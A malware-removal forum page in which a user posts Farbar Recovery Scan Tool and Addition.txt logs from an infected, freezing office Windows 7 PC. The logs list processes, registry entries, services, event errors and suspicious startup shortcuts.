(12/07/2016 04:55:11 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 04:47:44 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 03:31:55 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 03:07:47 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 03:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 02:01:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (12/07/2016 01:31:17 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/07/2016 01:10:50 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY) Description: The following fatal alert was received: 20. Error: (12/06/2016 10:25:12 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY) Description: The following fatal alert was generated: 10. The internal error state is 10. CodeIntegrity: =================================== Date: 2016-10-12 11:10:15.723 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2016-10-12 11:10:15.676 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2014-12-30 14:37:50.421 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:21:58.702 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-30 14:00:27.988 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 16:13:00.235 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 15:58:22.386 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 15:21:37.531 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:59:21.278 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-12-29 14:46:25.562 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz Percentage of memory in use: 53% Total physical RAM: 4052.52 MB Available physical RAM: 1876.44 MB Total Virtual: 8103.22 MB Available Virtual: 5822.23 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:465.66 GB) (Free:330.92 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EB6F6C15) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
- December 7, 2016
- 4 replies
Infection and Freezing

CGTIII replied to CGTIII's topic in Resolved Malware Removal Logs

Also I notice in the Windows System Event Log that groups of services (not always the same ones) are stopping and restarting.
- December 7, 2016
- 4 replies
Infection and Freezing

CGTIII posted a topic in Resolved Malware Removal Logs

Thanks in advance. Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 05-12-2016 Ran by Reception (administrator) on PC-4 (07-12-2016 03:51:00) Running from \\SPARTA\RedirectedFolders\Reception\Desktop Loaded Profiles: Clayton & Reception (Available Profiles: Clayton & dcreery & blagler & Reception) Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States) Internet Explorer Version 11 (Default browser: Chrome) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe () C:\Program Files (x86)\Backblaze\bzserv.exe (FileZilla Project) C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.exe (Print Tracker (866) 629-3342) C:\Program Files (x86)\Print Tracker\PMonitor.kpr () C:\Windows\SysWOW64\PSIService.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe (Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe (Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe (Microsoft Corporation) C:\Windows\System32\mobsync.exe (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe (Farbar) \\SPARTA\RedirectedFolders\Reception\Desktop\FRST64.exe (Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe ==================== Registry (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-07-26] (Apple Inc.) HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.) HKLM-x32\...\Run: [FileZilla Server Interface] => C:\Program Files (x86)\FileZilla Server\FileZilla Server Interface.exe [2452480 2015-01-09] (FileZilla Project) HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard) HKLM-x32\...\Run: [] => [X] HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-12-06] (Malwarebytes) Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.) Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_winlogonx64.dll (Citrix Systems, Inc.) Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Run: [**suokibuts<*>] => "C:\Users\Reception\AppData\Local\7b8b\d848.lnk" <===== ATTENTION (Value Name with invalid characters) HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation) HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-14] () IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\0783.lnk [2016-10-12] ShortcutTarget: 0783.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\356a.lnk [2016-12-07] ShortcutTarget: 356a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) Startup: \\SPARTA\RedirectedFolders\Reception\Start Menu\Programs\Startup\5cf1.lnk [2016-11-23] ShortcutTarget: 5cf1.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{0B496D74-E088-4F45-B2FD-58E5E9F5F3E1}: [DhcpNameServer] 192.168.0.105 192.168.0.1 Tcpip\..\Interfaces\{A4BE6A85-3332-4C3B-A231-82D7AFF8DAF1}: [DhcpNameServer] 172.20.10.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/enterprise/security_response/index.jsp?inid=biz_SR_sep_V12_1_MR_4 HKU\S-1-5-21-3320201264-2921037059-4171379232-1142\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://companyweb HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope {1A6ECD44-6984-4DCD-B3DF-84F92EC8DA9E} URL = BHO: TmIEPlugInBHO Class -> {1CA1377B-DC1D-4A52-9585-6E06050FAC53} -> C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg.dll => No File BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation) Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2012-12-18] (Adobe Systems Incorporated) Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1192 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File DPF: HKLM-x32 {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\TmIEPlg32.dll No File Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Client Server Security Agent\UIFramework\ProToolbarIMRatingActiveX.dll No File FireFox: ======== FF ProfilePath: C:\Users\Reception\AppData\Roaming\Mozilla\Firefox\Profiles\biqbxlip.default-1478011673580 [2016-11-09] FF HKLM-x32\...\Firefox\Extensions: [{22C7F6C6-8D67-4534-92B5-529A0EC09405}] - C:\Program Files\Trend Micro\AMSP\Module\20004\1.6.1106\6.6.1045\firefoxextension => not found FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Extension: (HP Smart Web Printing) - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-05-13] [not signed] FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-04-03] [not signed] FF HKU\S-1-5-21-3320201264-2921037059-4171379232-1192\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-08] () FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-08] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-12-18] () FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation) FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2014-02-18] (RocketLife, LLP) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-09] (Google Inc.) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-02-15] (Adobe Systems Inc.) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2013-12-18] (Adobe Systems Inc.) FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1192: @citrixonline.com/appdetectorplugin -> C:\Users\Reception\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-06-05] (Citrix Online) Chrome: ======= CHR Profile: C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default [2016-12-06] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-09] CHR Extension: (Avast Online Security) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09] CHR Extension: (Chrome Web Store Payments) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-11-09] CHR Extension: (No Name) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-11-09] CHR Extension: (Chrome Media Router) - C:\Users\Reception\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-06] ==================== Services (Whitelisted) ==================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.) R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-14] () R2 FileZilla Server; C:\Program Files (x86)\FileZilla Server\FileZilla Server.exe [774656 2015-01-09] (FileZilla Project) [File not signed] S3 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-06-05] (Citrix Online, a division of Citrix Systems, Inc.) S3 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\888\g2ax_service.exe [610528 2016-01-12] (Citrix Systems, Inc.) R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed] R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.) R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.) R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.) R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed] R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed] R2 PrintTracker; C:\Program Files (x86)\Print Tracker\PMonitor.exe [722400 2016-07-11] (Print Tracker (866) 629-3342) R2 ProtexisLicensing; C:\Windows\SysWOW64\PSIService.exe [174656 2006-11-02] () [File not signed] R2 SepMasterService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe [144496 2014-10-03] (Symantec Corporation) R3 SmcService; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe [2379128 2014-10-03] (Symantec Corporation) S3 SNAC; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\snac64.exe [335216 2014-10-03] (Symantec Corporation) S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation) ===================== Drivers (Whitelisted) ====================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R1 BHDrvx64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\BASHDefs\20161128.001\BHDrvx64.sys [1874136 2016-11-30] (Symantec Corporation) S3 C781BUS; C:\Windows\System32\DRIVERS\C781BUS.sys [99200 2011-07-14] (DEVGURU Co., LTD.) S3 C781Mdm; C:\Windows\System32\DRIVERS\C781Mdm.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr)) S3 C781Vsp; C:\Windows\System32\DRIVERS\C781Vsp.sys [183296 2011-07-14] (DEVGURU Co., LTD.(www.devguru.co.kr)) R1 ccSettings_{690CFB39-3E68-4966-A470-3A946C640A12}; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\ccSetx64.sys [169048 2014-10-03] (Symantec Corporation) R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-04] (Symantec Corporation) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-12-05] (Symantec Corporation) R1 IDSVia64; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\IPSDefs\20161205.011\IDSvia64.sys [1012952 2016-10-26] (Symantec Corporation) R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-11-05] (LogMeIn, Inc.) S4 LMIRfsClientNP; no ImagePath R3 NAVENG; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\ENG64.SYS [138456 2016-12-05] (Symantec Corporation) R3 NAVEX15; C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\Definitions\VirusDefs\20161206.001\EX64.SYS [2148056 2016-12-05] (Symantec Corporation) R1 SRTSP; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSP64.SYS [867032 2014-10-03] (Symantec Corporation) R1 SRTSPX; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SRTSPX64.SYS [36952 2014-10-03] (Symantec Corporation) S3 SyDvCtrl; C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\SyDvCtrl64.sys [35432 2014-10-03] (Symantec Corporation) R0 SymDS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMDS64.SYS [493656 2014-10-03] (Symantec Corporation) R0 SymEFA; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMEFA64.SYS [1148120 2014-10-03] (Symantec Corporation) R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-10-03] (Symantec Corporation) R1 SymIRON; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\Ironx64.SYS [225496 2014-10-03] (Symantec Corporation) R1 SYMNETS; C:\Windows\System32\Drivers\SEP\0C011010\103C.105\x64\SYMNETS.SYS [437976 2014-10-03] (Symantec Corporation) R1 SysPlant; C:\Windows\System32\Drivers\SysPlant.sys [155472 2014-10-03] (Symantec Corporation) S3 catchme; \??\C:\ComboFix\catchme.sys [X] S0 pwygo; System32\drivers\bvbqpsa.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One Month Created files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-12-06 05:52 - 2016-12-06 05:52 - 01065376 _____ (Google Inc.) C:\Users\Reception\Downloads\ChromeSetup (1).exe 2016-12-06 05:44 - 2016-12-06 05:44 - 00015182 _____ C:\Windows\system32\results.xml 2016-12-06 05:17 - 2016-12-06 05:17 - 40849704 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_151719.exe 2016-12-06 02:38 - 2016-12-06 02:38 - 125862080 _____ (Intel Corporation) C:\Users\Reception\Downloads\win64_153631.4414.exe 2016-12-06 02:36 - 2016-12-06 02:37 - 00000000 ____D C:\ProgramData\Package Cache 2016-12-06 02:35 - 2016-12-06 02:35 - 07491840 _____ (Intel) C:\Users\Reception\Downloads\Intel Driver Update Utility Installer.exe 2016-12-06 02:33 - 2016-12-06 02:33 - 86989752 _____ (Intel Corporation) C:\Users\Reception\Downloads\Win7Vista_64_152258.exe 2016-12-05 11:17 - 2016-12-05 11:17 - 00010168 ____N C:\bootsqm.dat 2016-12-02 04:56 - 2016-12-02 04:56 - 00244224 _____ C:\Users\Reception\Downloads\CF_UNINST.EXE 2016-12-02 03:02 - 2016-12-02 03:03 - 00000000 ____D C:\Program Files (x86)\CrystalDiskInfo 2016-12-02 03:02 - 2016-12-02 03:02 - 03956368 _____ (Crystal Dew World ) C:\Users\Reception\Downloads\CrystalDiskInfo7_0_4-en.exe 2016-12-02 03:02 - 2016-12-02 03:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo 2016-12-02 02:41 - 2016-12-02 02:45 - 00000000 ____D C:\Users\Reception\Doctor Web 2016-11-21 03:09 - 2016-12-07 03:51 - 00000000 ____D C:\FRST 2016-11-15 13:42 - 2016-11-15 15:41 - 00044360 __RSH C:\ProgramData\ntuser.pol 2016-11-14 18:46 - 2016-11-14 18:46 - 05659276 _____ (Swearware) C:\Users\Reception\Downloads\ComboFix (1).exe 2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Roadkil.Net 2016-11-14 12:33 - 2016-11-14 12:33 - 00000000 ____D C:\Program Files (x86)\Roadkil.Net 2016-11-14 12:32 - 2016-11-14 12:32 - 00362144 _____ (Roadkil.Net ) C:\Users\Reception\Downloads\CommTest.exe 2016-11-10 14:24 - 2016-07-14 04:09 - 00010240 _____ C:\Users\Reception\AppData\Local\Z@!-66cdbda3-850e-49fb-bcc4-315e343cf0e0.tmp 2016-11-10 14:24 - 2016-07-14 04:09 - 00009216 _____ C:\Users\Reception\AppData\Local\Z@S!-41305b6f-9545-4896-8e05-c1bc01799922.tmp 2016-11-10 14:23 - 2016-11-10 14:23 - 02308296 _____ (bomgar) C:\Users\Reception\Downloads\bomgar-scc-w0yc30wfd76ify8dz68xjy7xzf1ywwixfxi6xwc40jc90.exe 2016-11-09 14:24 - 2016-11-02 10:36 - 00382696 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2016-11-09 14:24 - 2016-11-02 10:32 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2016-11-09 14:24 - 2016-11-02 10:22 - 00308456 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2016-11-09 14:24 - 2016-11-02 10:16 - 00070656 _____ 